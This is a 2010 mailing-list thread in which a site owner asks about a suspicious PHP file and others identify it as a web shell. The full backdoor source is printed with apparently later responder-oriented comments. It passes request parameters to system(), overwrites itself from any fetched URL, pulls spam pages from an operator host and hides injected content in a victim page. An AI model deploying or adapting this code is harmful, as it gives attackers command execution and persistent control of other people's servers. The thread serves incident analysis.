
Odd PHP file, trying to find out what it does


From: bradmcmahon at gmail.com (Bradley McMahon)
Date: Mon, 1 Mar 2010 12:03:05 -0500

Here is the manual page for PHP's `system` function.

http://us.php.net/manual/en/function.system.php

looks like it could be pretty nasty.
-Brad




On Mon, Mar 1, 2010 at 11:29 AM, Andrew Ellis <only.samurai at gmail.com> wrote:
This is pretty heavily obscured (obviously), but the structure and
some of the things it does are reminiscent of a PHP shell such as C99.

Code like:
function Com()
{
? ?if (isset($_POST['c']))
? ? ?@system($_POST['c']);
?if (isset($_GET['c']))
? ? ? ?@system($_GET['c']);
}
is used to pass shell commands from the web page to the server, giving
the malicious user finer-grained control.

I copied all the code you posted to a server and ran it through php at
the command line. If you add in something like $_POST['c'] = "ls >
test.txt" to the top of the file and run it, you'll find no output on
the page, but a nicely created test.txt file with the contents of the
directory containing this script...

Sad to say, looks like you were 0wned.



On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
Ok, I think one of my sites may have been compromised. I found the following
PHP script on a site, but I'm not sure what it is trying to do. Anyone else
ever seen this script before?

Adrian

<?php
// Keep the script running after the HTTP client disconnects and lift the
// execution time limit: the Gen() routine below fetches remote content in a
// loop, and the operator does not need to keep the connection open for it.
ignore_user_abort(1);
set_time_limit(0);

/**
 * "cl" action: deletes the backdoor's local state files from the script's
 * working directory -- "c" (page-generation state, written by Gen()), "1r"
 * (list of generated landing pages, appended to by Gen()) and "log" (not
 * written anywhere in this file; presumably produced by a sibling component).
 *
 * unlink() is not error-suppressed here, so a missing file leaves a PHP
 * warning in the response or error log -- a useful artefact when
 * reconstructing when the operator ran a clean-up.
 */
function Clear()
{
    unlink("c");
    unlink("1r");
    unlink("log");
}

/**
 * "cl2" action: strips the injected content back out of the victim page.
 *
 * The target page name is read from the local file "m" and resolved as
 * "../<name>", i.e. the page lives one directory above this script. Everything
 * between the marker pairs <adsttnmq1>...<sdioyslkjs2> and
 * <!--dd4-->...<!--dd5-->, any <a> element whose attributes contain "_lm",
 * any "http ... tmp6 ... </a>" run, the bare markers themselves and the
 * zero-size <font> wrapper used to hide the injected block are removed, and
 * the file is rewritten in place. Echoes " upt-ok" as an acknowledgement.
 *
 * Note for responders: ereg_replace() was removed in PHP 7, so this routine
 * (like UpKos() and MRepl()) only runs on PHP 5 hosts. The patterns double as
 * indicators for other pages on the same host: the "adsttnmq1"/"sdioyslkjs2"
 * markers, the dd4/dd5 comments and the hidden <font> block.
 */
function Clear2()
{
    // Victim page name is stored in "m"; the page is one level up.
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
    $fin = ereg_replace("<!--dd5-->", "", $fin);
    // Same zero-size <font> wrapper that MRepl() appends (literal is wrapped
    // across two lines in the archived copy).
    $fin = ereg_replace("<font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">", "", $fin);
    // Overwrite the page in place.
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

/**
 * Reads request parameter $name into $var (by reference): POST first, then
 * GET, so a GET value overrides a POST value of the same name. $var is reset
 * to "" before the lookup. Returns false when the resulting value is the empty
 * string, true otherwise. No validation or filtering is applied -- callers use
 * the value verbatim (MRepl() passes "mpt" to fopen() and writes "drs" into a
 * page).
 */
function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];

    if (isset($_GET[$name]))
        $var = $_GET[$name];

    // Loose comparison against ""; $var is always a string here.
    if (($var) =="")
        return false;
    else return true;
}

/**
 * "g" action: generates a batch of pages under a randomly named directory
 * tree and records where they were written.
 *
 * Request parameters (POST, overridden by GET): "sg" -- base used to build the
 * source locations "<sg>2.txt" and "<sg>sgen.php" (presumably a URL under the
 * operator's control fetched via allow_url_fopen -- confirm from outbound
 * traffic or access logs); "gm" -- the value passed through to the generator
 * as "g" ($curs). Neither is checked for presence; if one is missing PHP
 * raises an undefined-variable notice and the location is built from "".
 *
 * State lives in the local file "c" (four lines: top directory, current
 * subdirectory, current "g" value, next page index) and is rewritten on every
 * call; the path of every "_lm.htm" page is appended to "1r". Each call
 * writes ten pages; after the hundredth page of a subdirectory the next call
 * starts a fresh 3-letter subdirectory.
 *
 * Artefacts for responders: a 5-letter lower-case directory next to this
 * script containing a .htaccess (contents fetched from "<sg>2.txt"),
 * 3-letter subdirectories holding "<curs>_<n>.htm" (n = 0..99) and
 * "<curs>_lm.htm", plus the files "c" and "1r".
 */
function Gen()
{
    // 27-character alphabet for random directory names; mt_rand(0,26) below
    // indexes all of it.
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array(); // unused in this copy
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];

    if (isset($_GET["sg"]))
        $sg = $_GET["sg"];

    if (isset($_POST["gm"]))
        $g = $_POST["gm"];

    if (isset($_GET["gm"]))
        $g = $_GET["gm"];


    // $path is always "", so the recorded $map below starts with "/".
    $path = "";
    // Index of generated landing pages; only written when a batch of 100
    // completes ($j == 100). The handle is never closed explicitly.
    $fr = fopen("1r", "a+");
    if (file_exists("c"))
    {
        // Resume from saved state: tname, cname, curs, pid -- one per line.
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100)
        {
            // Subdirectory is full (_0.._99 written): start a new 3-letter
            // subdirectory and take the current "gm" value.
            $pid = 0;
            $rnd = mt_rand(0, 999); // unused
            $nm = "";
            for ($i=0; $i<3; $i++)
            {
                $ran = mt_rand(0,26);
                $sym = $alp[$ran];
                $nm = $nm.$sym;
            }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    }
    else
    {
        // First run: create a new 5-letter top directory with a .htaccess
        // whose contents are fetched from "<sg>2.txt".
        $rnd = mt_rand(0, 999); // unused
        $nm = "";
        for ($i=0; $i<5; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp))
        {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        // First 3-letter subdirectory.
        $rnd = mt_rand(0, 999); // unused
        $nm = "";
        for ($i=0; $i<3; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $cname = $nm;
        mkdir("$tname/$cname");
    }
    // Fetch ten pages from "<sg>sgen.php?g=<curs>" and store each as
    // "<tname>/<cname>/<curs>_<j>.htm".
    $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);

        $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }

    // After the hundredth page, fetch the "m=1" variant, store it as
    // "<curs>_lm.htm" and record its path in "1r".
    if ($j==100)
    {
        $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp))
        {
            $fc = fgets($fp, 1024);
            if (!$fc) break;
            $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.htm";
        fwrite($fr,"$map\n");
    }

    // Persist state for the next call; $j is now $pid + 10.
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}

/**
 * "u" action: self-update. Reads the whole of whatever the "u" request
 * parameter names (POST, overridden by GET; any path -- or, with
 * allow_url_fopen, URL -- that fopen() accepts) and overwrites "1.php" in the
 * script's working directory with it. The hard-coded name suggests this
 * script is itself deployed as 1.php -- confirm against the file found on the
 * host. The fetched payload is written without any inspection.
 */
function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
        $u = $_POST['u'];

    if (isset($_GET['u']))
        $u = $_GET['u'];

    // Read the new payload in 1 KiB chunks until EOF or a short/failed read.
    $fp = fopen($u, "r");
    $fin = '';
    while (!feof($fp))
    {
        $fc = fgets($fp, 1024);
        if (!$fc) break;
        $fin .= $fc;
    }
    fclose($fp);

    // Replace the on-disk script.
    $fthis = fopen($thisname, "w+");
    fwrite($fthis, $fin);
    fclose($fthis);
}

/**
 * "c" action: remote command execution. Passes the "c" request parameter
 * (POST and then GET -- both are run if both are present) to system() with
 * errors suppressed by "@". This is what makes the script a web shell; in
 * the access logs, every request to this file carrying a "c" parameter should
 * be read as a command the attacker executed.
 */
function Com()
{
    if (isset($_POST['c']))
        @system($_POST['c']);
    if (isset($_GET['c']))
        @system($_GET['c']);
}

/**
 * "uk" action: re-tags the injection markers in the victim page. Reads the
 * page name from "m" (resolved as "../<name>"), rewrites the bare strings
 * "adsttnmq1" / "sdioyslkjs2" as the tagged forms "<adsttnmq1>" /
 * "<sdioyslkjs2>" that Clear2() and MRepl() match on, and writes the file
 * back. Uses ereg_replace(), so it only runs on PHP 5.
 */
function UpKos()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
    $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}


/**
 * "s" action: injects hidden content into the victim page.
 *
 * Reads the page name from "m" ("../<name>"), removes any closing </body> and
 * </html> tags and any previously injected block (dd4/dd5 and
 * adsttnmq1/sdioyslkjs2 markers), then appends: the <adsttnmq1> marker, a
 * <font> element styled to zero size with overflow hidden (presumably so the
 * block is not seen by human visitors while still being present in the HTML),
 * the raw "drs" request parameter with backslashes stripped, and a closing
 * "</font></body></html><sdioyslkjs2>". The "mpt" parameter is opened for
 * reading but the handle is never used or closed (dead code in this copy).
 *
 * Responders: search the site for "adsttnmq1" and for the
 * "position: absolute;overflow: hidden;height: 0;width: 0" style to find
 * pages that have been seeded.
 */
function MRepl()
{
    $mpt = "";
    $drs = "";
    // Opening wrapper (literal is wrapped across two lines in the archived copy).
    $begtag = "<adsttnmq1><font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">";
    $endtag = "</font></body></html><sdioyslkjs2> ";
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
    // (original comment was mis-encoded in the archive and is not recoverable)
    // Drop the closing tags so the appended block ends up inside the document.
    $fin = preg_replace ("/<\/body>/i", "", $fin);
    $fin = preg_replace ("/<\/html>/i", "", $fin);
    // Remove an earlier injection before adding the new one.
    $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
    // Handle is never read from or closed.
    $fp = fopen($mpt, "r");
    GetVar("drs", $drs);
    $fin = $fin.$begtag;
    // Strips backslashes from the request value before it is written out.
    $drs = str_replace("\\", "", $drs);
    $fin = $fin.$drs;
    $fin = $fin.$endtag;
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

/**
 * Dispatcher: the first request parameter found (POST or GET, presence only,
 * value ignored) selects one action, which is followed by exit():
 *   u   -> Update()  overwrite 1.php with fetched content
 *   c   -> Com()     system() on the parameter
 *   uk  -> UpKos()   re-tag injection markers in the victim page
 *   g   -> Gen()     generate pages under random directories
 *   s   -> MRepl()   inject hidden content into the victim page
 *   cl  -> Clear()   delete state files
 *   cl2 -> Clear2()  strip injected content from the victim page
 * With none present it prints "<ok>", which serves as a reachability check
 * for the operator -- a bare "<ok>" response body in the logs is itself an
 * indicator.
 */
function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }

    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }

    if (isset($_POST['uk']) || isset($_GET['uk']))
    {
        UpKos();
        exit();
    }

    // Note: the trigger is "g"; Gen() itself reads "gm" and "sg".
    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }

    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }

    if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }

    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }

    echo "<ok>";

}

// Entry point: everything is request-driven; without a recognised parameter
// the script only answers "<ok>".
Main();

?>





--
Andrew Ellis
http://blog.psych0tik.net


